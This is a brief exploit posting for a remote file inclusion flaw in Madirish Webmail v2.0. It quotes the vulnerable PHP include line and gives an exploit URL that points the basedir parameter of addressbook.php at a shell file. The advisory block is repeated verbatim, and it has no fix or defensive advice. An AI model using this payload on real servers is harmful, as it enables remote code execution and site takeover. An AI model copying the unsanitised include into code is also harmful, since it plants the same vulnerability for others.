Madirish Webmail version 2.0 suffers from a remote file inclusion vulnerability.
f74181ebd7f79da849299ffbde20518867743f25fec9eea99e1dfd67343011c8
###########################################################
Madirish Webmail v2.0 Remote File Include Vulnerabilities
Author : BoZKuRTSeRDaR
Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM
My Homepage :WwW.Turkmilliyetcileri.OrG
script Download : http://sourceforge.net/projects/madirishwebmail
###############################################################################
code:
require_once($GLOBALS['basedir']."lib/sql.php")
exploit:
http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?###########################################################
Madirish Webmail v2.0 Remote File Include Vulnerabilities
Author : BoZKuRTSeRDaR
Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM
My Homepage :WwW.Turkmilliyetcileri.OrG
script Download : http://sourceforge.net/projects/madirishwebmail
###############################################################################
code:
require_once($GLOBALS['basedir']."lib/sql.php")
exploit:
http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?